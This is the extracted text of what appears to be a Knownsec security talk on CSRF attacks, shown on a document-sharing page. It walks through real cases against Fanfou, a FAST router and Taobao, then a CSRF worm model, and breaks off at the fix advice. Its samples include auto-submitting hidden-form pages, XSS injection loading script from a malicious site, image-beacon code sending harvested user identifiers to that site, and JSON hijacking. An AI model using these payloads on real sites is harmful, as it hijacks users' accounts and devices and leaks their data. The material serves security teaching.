版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡介
Knownsec
TeamCSRF攻擊-蘇醒的巨人CSRF是什么Cross-SiteRequestForgery跨站請求偽造。–1、跨站點(diǎn)的請求;2、請求是偽造的。被攻擊者的瀏覽器被迫向目標(biāo)站點(diǎn)發(fā)起了偽造的請求,這個(gè)過程會(huì)帶上被攻擊者的身份驗(yàn)證標(biāo)識(shí)(session)以通過目標(biāo)站點(diǎn)的驗(yàn)證。從而借用被攻擊者在目標(biāo)站點(diǎn)上的權(quán)限進(jìn)行一系列不被期望的操作。內(nèi)容1、CSRF模型2、CSRF攻擊與基于CSRF的攻擊3、CSRF蠕蟲模型4、修補(bǔ)建議5、Q&A一、CSRF模型CSRF模型瀏覽器被攻擊者目標(biāo)站點(diǎn)惡意站點(diǎn)帶上session/cookie可信任的請求可信任的請求正常的請求偽造的請求惡意站點(diǎn)惡意站點(diǎn)=目標(biāo)站點(diǎn),同域CSRF。惡意站點(diǎn)!=目標(biāo)站點(diǎn),跨域CSRF。也許包含的CSRF攻擊代碼:<img
src=“http://目標(biāo)站點(diǎn)/action=delete&id=7”><formaction=“http://目標(biāo)站點(diǎn)/post.php”><input
type=“text”
style=“…”
name=“title”value=“csrf”
/><input
…</form><iframesrc=“…”>…<param
name="movie"
value="post_as3.swf"
/><embedsrc="post_as3.swf“…瀏覽器本地cookie:IE及IE內(nèi)核瀏覽器:CSRF時(shí),阻止帶上本地cookie。FF等瀏覽器:沒這種限制。內(nèi)存cookie:即session
cookie。IE與FF等瀏覽器不會(huì)阻止這類cookie。多標(biāo)簽瀏覽器:關(guān)閉標(biāo)簽頁時(shí),session
cookie沒被清除。其他問題:session的瀏覽器窗口繼承問題??尚湃蔚恼埱笳5恼埱?、偽造的請求。瀏覽器、目標(biāo)站點(diǎn)沒對它們進(jìn)行區(qū)分。主要請求的類型:POST型CSRF、GET型CSRF。利用各種技術(shù)在客戶端發(fā)起有效的POST請求與GET請求。各種技術(shù):JavaScript,
ActionScript,
HTML/CSS,XML,ASP,PHP,JSP,.NET等等。用戶驅(qū)動(dòng)下的請求:主動(dòng)的、被動(dòng)的。二、CSRF攻擊與基于CSRF的攻擊CSRF攻擊CSRF攻擊能完成這些事:刪除、修改、新增目標(biāo)站點(diǎn)上被攻擊者的數(shù)據(jù);JSON
Hijacking等獲取被攻擊者的隱私數(shù)據(jù);作為其它攻擊向量的輔助攻擊手法;使被攻擊者成為黑客下一步攻擊的跳板;甚至可以實(shí)現(xiàn)CSRF蠕蟲攻擊。下面是真實(shí)世界的CSRF攻擊實(shí)例……CSRF攻擊-實(shí)例1被攻擊者(下面就是余弦)登錄飯否CSRF攻擊-實(shí)例1余弦看到好友evilcos的消息:不錯(cuò)的攻擊手法:。于是好奇點(diǎn)擊去看。CSRF攻擊-實(shí)例1余弦的消息“test~”被刪了?!CSRF攻擊-實(shí)例1問題出現(xiàn)在這個(gè)惡意站點(diǎn)的文件:,代碼如下:<?php$s
=
"<form
method='post'
action='
'>";$s
=
$s."<input
type='text'
value='CI1z1FVs59Y'name='msg'style='display:none!important;display:block;width=0;height=0'
/>";$s
=
$s."<input
type='text'
value='msg.del'
name='action'style='display:none!important;display:block;width=0;height=0'
/>";$s
=
$s."</form>";$s
=
$s."<script>document.forms[0].submit();</script>";echo($s);?>CSRF攻擊-實(shí)例1其實(shí)還可以這樣:<img
src="
"
/>使用了POST與GET兩種CSRF方式刪除消息。偽造的刪除請求來自惡意站點(diǎn)。刪除請求被目標(biāo)站點(diǎn)執(zhí)行之前,目標(biāo)站點(diǎn)會(huì)檢測是否有合法的身份驗(yàn)證標(biāo)識(shí)(session/cookie)。被攻擊者肯定不希望看到這樣的結(jié)果。CSRF攻擊-實(shí)例2還可以對本地網(wǎng)絡(luò)設(shè)備進(jìn)行CSRF攻擊。CSRF攻擊-實(shí)例2FAST無線寬帶路由器的管理界面——遠(yuǎn)端WEB管理CSRF攻擊-實(shí)例2在登錄狀態(tài),被攻擊者訪問了帶有CSRF攻擊代碼的網(wǎng)頁時(shí),就“被迫”開啟了“遠(yuǎn)程WEB管理”功能。CSRF攻擊-實(shí)例2CSRF攻擊代碼如下:<img
src=
>使用GET方式發(fā)起的CSRF攻擊。通過社工等手法讓被攻擊者訪問惡意站點(diǎn)的CSRF文件。FAST無線寬帶路由器的WEB管理的默認(rèn)用戶名與密碼:admin。CSRF攻擊-實(shí)例3CSRF不一定需要瀏覽器:rar自解壓文件內(nèi)執(zhí)行javascript,等。rar自解壓文件如何CSRF成功?目標(biāo)站點(diǎn)存放了本地cookie。截圖……CSRF攻擊-實(shí)例3CSRF攻擊-實(shí)例3基于CSRF的攻擊基于CSRF的XSS攻擊基于CSRF的SQL注入攻擊基于CSRF的命令執(zhí)行攻擊……需要權(quán)限驗(yàn)證的漏洞可以使用基于CSRF的攻擊手法。經(jīng)常被忽略的安全問題?;贑SRF的攻擊-實(shí)例被攻擊者登錄自己的淘寶。在“編輯個(gè)人信息”處存在持久型的XSS漏洞?;贑SRF的攻擊-實(shí)例他同時(shí)訪問了。隨后發(fā)生了XSS攻擊?;贑SRF的攻擊-實(shí)例的部分代碼如下:<%s
=
"<form
method='post'
action='
'>“……s
=
s+"<input
type='text'style='display:none!important;display:block;width=0;height=0'
value='
火星"onmouseover="alert(/hi/.source)'name='_fmm.edi._0.a'/>“……s
=
s+"</form>"s
=
s+"<script>document.forms[0].submit();</script>"Response.write(s)%>三、CSRF蠕蟲模型CSRF蠕蟲模型CSRF蠕蟲數(shù)據(jù)處理中心Web2.0——具有CSRF漏洞數(shù)據(jù)獲取模塊數(shù)據(jù)發(fā)送模塊XSS服務(wù)端代理技術(shù)JSON
HijackingFlash(crossdomain.xml)POST(form/flash)GET(url)唯一標(biāo)識(shí)1、數(shù)據(jù)獲取模塊同域CSRF攻擊。同域內(nèi)獲取數(shù)據(jù)幾乎沒任何限制??缬駽SRF攻擊。跨域獲取數(shù)據(jù)的幾種方法:
1、XSS2、服務(wù)端代理技術(shù)
3、JSON
Hijacing4、Flash
AsctionScript(crossdomain.xml)要獲取的關(guān)鍵數(shù)據(jù)是唯一標(biāo)識(shí):唯一的、無法全部預(yù)知的用戶id、用戶昵稱、用戶email、用戶個(gè)人頁面地址等。使用XSS使用目標(biāo)站點(diǎn)上的XSS漏洞:<iframe
width=0
height=0
src=‘http://目標(biāo)站點(diǎn)/search.php?k=“><script
src=http://惡意站點(diǎn)/get.js></script>’></iframe>http://惡意站點(diǎn)/get.js的代碼是://use
DOM
method
to
get
your
datanew
Image().
src=‘http://惡意站點(diǎn)/do.php?data=‘+yourdata;惡意站點(diǎn)的do.php文件接收唯一標(biāo)識(shí)等數(shù)據(jù)。該唯一標(biāo)識(shí)可以是url中的或是目標(biāo)站點(diǎn)url對應(yīng)的內(nèi)容中的。使用服務(wù)端代理使用服務(wù)端代理技術(shù):
服務(wù)端的XMLHTTP,php的file_get_contents等等。無法獲取頁面內(nèi)容中的唯一標(biāo)識(shí),只能獲取url中的唯一標(biāo)識(shí):使用referer來獲取目標(biāo)站點(diǎn)的url。r=
Request.ServerVariables(“HTTP_REFERER”)。r可能為http://目標(biāo)站點(diǎn)/space/user/?id=2343,其中2343就是唯一標(biāo)識(shí)。使用JSON
HIJACKING使用JSON
Hijacking技術(shù):目標(biāo)站點(diǎn)使用了JSON數(shù)據(jù)傳輸用戶私有數(shù)據(jù)。該私有數(shù)據(jù)內(nèi)包含我們需要的唯一標(biāo)識(shí)等信息。相關(guān)代碼:<script>function
hijack(o){//use
DOM
method
to
get
your
datanew
Image().src="
"+escape(data);}</script><script/private_messages/inbox.json?callback=hijack&count=2></script>使用FLASH使用Flash
ActionScript腳本:目標(biāo)站點(diǎn)下必須存在crossdomain.xml文件。crossdomain.xml中的配置允許其他域的AS腳本進(jìn)行跨域請求。<?xml
version="1.0"?><cross-domain-policy><allow-access-from
domain="*"
/></cross-domain-policy>相關(guān)代碼:import
.*;var
_l=new
URLLoader(new
URLRequest(“http://目標(biāo)站點(diǎn)/"));_l.addEventListener(Event.COMPLETE,function(){text1.text
=_l.data});_l.load();其它方法<script>標(biāo)簽的跨域性質(zhì):目標(biāo)站點(diǎn)有些根據(jù)用戶唯一標(biāo)識(shí)生成的.js等文件。也許包含唯一標(biāo)識(shí)在這些文件中,比如var
user_id=2343;。我們可以獲取這樣的全局變量。IE8下的XDomainRequest:目標(biāo)站點(diǎn)返回的HTTP頭部中帶有
XDomainRequestAllowed=1。CSSHttpRequest:目標(biāo)站點(diǎn)返回這樣格式的數(shù)據(jù):@importurl(about:chr:data);其實(shí)我們漏了非常重要的一點(diǎn):我們來控制初始唯一標(biāo)識(shí),這在飯否CSRF蠕蟲中會(huì)講到。2、數(shù)據(jù)發(fā)送模塊唯一標(biāo)識(shí)的作用。在CSRF蠕蟲數(shù)據(jù)處理中心對唯一標(biāo)識(shí)對應(yīng)的其它相關(guān)用戶發(fā)起CSRF攻擊。就是這樣的傳播方式。使用POST或GET型的CSRF發(fā)送偽造后的請求。各種技術(shù):JavaScript,
ActionScript,
HTML/CSS,XML,ASP,PHP,JSP,.NET等等。在客戶端發(fā)送,否則帶不上session/cookie。CSRF蠕蟲模型CSRF蠕蟲數(shù)據(jù)處理中心Web2.0——具有CSRF漏洞數(shù)據(jù)獲取模塊數(shù)據(jù)發(fā)送模塊XSS服務(wù)端代理技術(shù)JSON
HijackingFlash(crossdomain.xml)POST(form/flash)GET(url)唯一標(biāo)識(shí)飯否CSRF蠕蟲看這段錄像……四、修補(bǔ)建議修補(bǔ)建議在服務(wù)端區(qū)嚴(yán)格區(qū)分好
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 二零二五版墓地使用權(quán)轉(zhuǎn)售與墓園維護(hù)服務(wù)合同4篇
- 2025版園藝樹苗種植合作合同范本范文3篇
- 安徽省蕪湖市無為市2024-2025學(xué)年七年級(jí)上學(xué)期期末地理試題(含答案)
- 儀器儀表在智能娛樂與虛擬現(xiàn)實(shí)體驗(yàn)中的應(yīng)用考核試卷
- 小麥種植農(nóng)業(yè)土地流轉(zhuǎn)研究考核試卷
- 二零二五年度木雕工藝研發(fā)與創(chuàng)新合作合同4篇
- 2025年受歡迎廣告協(xié)議指南大揭秘攻略
- 2025年化工品批發(fā)合同
- 2025年孕婦健身指導(dǎo)服務(wù)協(xié)議
- 2025年高端紙質(zhì)信封印刷定制委托協(xié)議6篇
- 2025年上半年江蘇連云港灌云縣招聘“鄉(xiāng)村振興專干”16人易考易錯(cuò)模擬試題(共500題)試卷后附參考答案
- DB3301T 0382-2022 公共資源交易開評(píng)標(biāo)數(shù)字見證服務(wù)規(guī)范
- 人教版2024-2025學(xué)年八年級(jí)上學(xué)期數(shù)學(xué)期末壓軸題練習(xí)
- 江蘇省無錫市2023-2024學(xué)年八年級(jí)上學(xué)期期末數(shù)學(xué)試題(原卷版)
- 俄語版:中國文化概論之中國的傳統(tǒng)節(jié)日
- 2022年湖南省公務(wù)員錄用考試《申論》真題(縣鄉(xiāng)卷)及答案解析
- 婦科一病一品護(hù)理匯報(bào)
- 2024年全國統(tǒng)一高考數(shù)學(xué)試卷(新高考Ⅱ)含答案
- 移動(dòng)商務(wù)內(nèi)容運(yùn)營(吳洪貴)任務(wù)四 引起受眾傳播內(nèi)容要素的掌控
- 繪本《汪汪的生日派對》
- 助產(chǎn)護(hù)理畢業(yè)論文
評(píng)論
0/150
提交評(píng)論